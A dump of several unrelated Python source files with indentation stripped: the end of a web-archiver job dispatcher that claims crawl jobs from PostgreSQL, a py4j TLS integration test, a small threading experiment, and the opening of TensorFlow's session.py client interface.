# TINY changes will break the query optimizer, and
# the 10 ms query will suddenly take 10 seconds!
if mode == 'priority':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.priority <= (
SELECT
min(priority)
FROM
raw_web_pages
WHERE
state = 'new'::dlstate_enum
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
) + 1
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
elif mode == 'new_fetch':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.fspath IS NULL
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
elif mode == 'random':
raw_query = '''
UPDATE
raw_web_pages
SET
state = 'fetching'
WHERE
raw_web_pages.id IN (
SELECT
raw_web_pages.id
FROM
raw_web_pages
WHERE
raw_web_pages.state = 'new'
AND
raw_web_pages.ignoreuntiltime < now() + '5 minutes'::interval
LIMIT {in_flight}
)
AND
raw_web_pages.state = 'new'
RETURNING
raw_web_pages.id, raw_web_pages.netloc, raw_web_pages.url;
'''.format(in_flight=min((MAX_IN_FLIGHT_JOBS, 150)))
else:
self.log.error("Unknown dispatch mode: '%s'" % mode)
return
start = time.time()
while self.run_flag.value == 1:
try:
cursor.execute("""SET statement_timeout TO 900000;""")
cursor.execute(raw_query)
rids = cursor.fetchall()
self.local.db_interface.commit()
break
except psycopg2.Error:
delay = random.random() / 3
# traceback.print_exc()
self.log.warn("Error getting job (psycopg2.Error)! Delaying %s.", delay)
time.sleep(delay)
self.local.db_interface.rollback()
if self.run_flag.value != 1:
return 0
if not rids:
return 0
rids = list(rids)
# If we broke because a user-interrupt, we may not have a
# valid rids at this point.
if self.run_flag.value != 1:
return 0
xqtim = time.time() - start
if not rids:
self.log.warning("No jobs available! Sleeping for 5 seconds waiting for new jobs to become available!")
for dummy_x in range(5):
if self.run_flag.value == 1:
time.sleep(1)
return 0
if xqtim > 0.5:
self.log.error("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
elif xqtim > 0.1:
self.log.warn("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
else:
self.log.info("Query execution time: %s ms. Fetched job IDs = %s", xqtim * 1000, len(rids))
dispatched = 0
for rid, netloc, joburl in rids:
try:
# If we don't have a thread affinity, do distributed fetch.
# If we /do/ have a thread affinity, fetch locally.
if not self.outbound_job_wanted(netloc, joburl):
self.delete_job(rid, joburl)
continue
if self.outbound_job_disabled(netloc, joburl):
self.disable_job(rid, joburl)
continue
dispatched += 1
threadn = RawArchiver.misc.thread_affinity(joburl, 1)
if threadn is True:
with self.limiter_lock:
self.ratelimiter.put_job(rid, joburl, netloc)
# self.put_outbound_job(rid, joburl, netloc=netloc)
else:
self.blocking_put_response(("unfetched", rid))
except RawArchiver.misc.UnwantedUrlError:
self.log.warning("Unwanted url in database? Url: '%s'", joburl)
self.log.warning("Deleting entry.")
cursor.execute("""DELETE FROM raw_web_pages WHERE url = %s AND id = %s;""", (joburl, rid))
self.local.db_interface.commit()
cursor.execute("""RESET statement_timeout;""")
cursor.close()
return dispatched
def delete_job(self, rid, joburl):
self.log.warning("Deleting job for url: '%s'", joburl)
cursor = self.local.db_interface.cursor()
cursor.execute("""DELETE FROM raw_web_pages WHERE raw_web_pages.id = %s AND raw_web_pages.url = %s;""", (rid, joburl))
self.local.db_interface.commit()
def disable_job(self, rid, joburl):
self.log.warning("Disabling job for url: '%s'", joburl)
cursor = self.local.db_interface.cursor()
cursor.execute("""UPDATE raw_web_pages SET state = %s WHERE raw_web_pages.id = %s AND raw_web_pages.url = %s;""", ('disabled', rid, joburl))
self.local.db_interface.commit()
def get_status(self):
if any([tmp.is_alive() for tmp in self.fetch_procs]):
return "Worker: %s, alive: %s, control: %s, last_rx: %s, active_jobs: %s, jobs_out: %s, jobs_in: %s." % (
[tmp.ident for tmp in self.fetch_procs],
[tmp.is_alive() for tmp in self.fetch_procs],
self.run_flag.value,
self.last_rx,
self.active_jobs,
self.jobs_out,
self.jobs_in,
)
return "Worker is none! Error!"
def test2():
import logSetup
import pprint
logSetup.initLogging()
agg = RawJobAggregator()
outq = agg.get_queues()
for x in range(20):
print("Sleeping, ", x)
time.sleep(1)
try:
j = outq.get_nowait()
print("Received job! %s", len(j))
with open("jobs.txt", "a") as fp:
fp.write("\n\n\n")
fp.write(pprint.pformat(j))
print(j)
except queue.Empty:
pass
print("Joining on the aggregator")
agg.join_proc()
print("Joined.")
if __name__ == "__main__":
test2()
|
java_tls_test.py
|
"""
Created on Feb 2, 2016
@author: Nick White
"""
from __future__ import unicode_literals, absolute_import
from multiprocessing import Process
import subprocess
import unittest
import ssl
import os
import sys
from py4j.java_gateway import (
JavaGateway, CallbackServerParameters,
set_default_callback_accept_timeout, GatewayParameters)
from py4j.tests.java_gateway_test import (
PY4J_JAVA_PATH, safe_shutdown, sleep)
set_default_callback_accept_timeout(0.125)
def start_example_tls_server():
subprocess.call([
"java", "-cp", PY4J_JAVA_PATH,
"py4j.examples.ExampleSSLApplication"])
def start_example_tls_process():
p = Process(target=start_example_tls_server)
p.start()
sleep()
return p
class Adder(object):
def doOperation(self, i, j):
return i + j
class Java:
implements = ["py4j.examples.Operator"]
if sys.version_info >= (2, 7):
# ssl.SSLContext introduced in Python 2.7
class TestIntegration(unittest.TestCase):
"""Tests cases borrowed from other files, but executed over a
TLS connection.
"""
def setUp(self):
key_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"selfsigned.pem")
client_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_ssl_context.verify_mode = ssl.CERT_REQUIRED
client_ssl_context.check_hostname = True
client_ssl_context.load_verify_locations(cafile=key_file)
server_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_ssl_context.load_cert_chain(key_file, password='password')
callback_server_parameters = CallbackServerParameters(
ssl_context=server_ssl_context)
# address must match cert, because we're checking hostnames
gateway_parameters = GatewayParameters(
address='localhost',
ssl_context=client_ssl_context)
self.p = start_example_tls_process()
self.gateway = JavaGateway(
gateway_parameters=gateway_parameters,
callback_server_parameters=callback_server_parameters)
sleep()
def tearDown(self):
safe_shutdown(self)
self.p.join()
sleep()
def testUnicode(self):
sb = self.gateway.jvm.java.lang.StringBuffer()
sb.append("\r\n\tHello\r\n\t")
self.assertEqual("\r\n\tHello\r\n\t", sb.toString())
def testMethodConstructor(self):
sleep()
adder = Adder()
oe1 = self.gateway.jvm.py4j.examples.OperatorExample()
# Test method
oe1.randomBinaryOperator(adder)
# Test constructor
oe2 = self.gateway.jvm.py4j.examples.OperatorExample(adder)
self.assertTrue(oe2 is not None)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import time
import threading
#_lock = threading.Lock()
def _io_bound():
while True:
time.sleep(1)
print("io: ", threading.current_thread().ident)
# _lock.acquire()
# for i in range(10000000):
# pass
# _lock.release()
def _cpu_bound():
k = 0
while k < 50:
for i in range(1000000):
pass
#print(threading.current_thread().ident)
#k += 1
#print(k)
# if k == 5:
# break
#k += 1
#print(k)
import os
import sys
import time
print(sys.executable, " ", os.getpid())
t0 = time.time()
# import gil_load
# gil_load.init()
# gil_load.start(output=sys.stdout)
for i in range(1):
t = threading.Thread(target=_io_bound)
t.daemon = True
t.start()
wait_threads = []
for i in range(3):
t = threading.Thread(target=_cpu_bound)
t.daemon = True
t.start()
wait_threads.append(t)
print("all threads created!")
# try:
for t in wait_threads:
t.join()
# except:
# sys.exit(0)
print("Elapsed=%0.6f" % (time.time() - t0))
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import pywrap_tf_session as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
if isinstance(fetches, wrapt.ObjectProxy):
self._fetch_type = type(fetches.__wrapped__)
else:
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
if isinstance(fetches, collections.defaultdict):
self._type_ctor = functools.partial(collections.defaultdict,
fetches.default_factory)
else:
self._type_ctor = self._fetch_type
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
def _generator():
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
yield k, m.build_results([values[j] for j in vi])
return self._type_ctor(_generator())
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch.ref()] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x.ref() not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i].ref() in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i].ref()].eval()
else:
value = self._feeds.get(self._fetches[i].ref())
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i].ref())
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
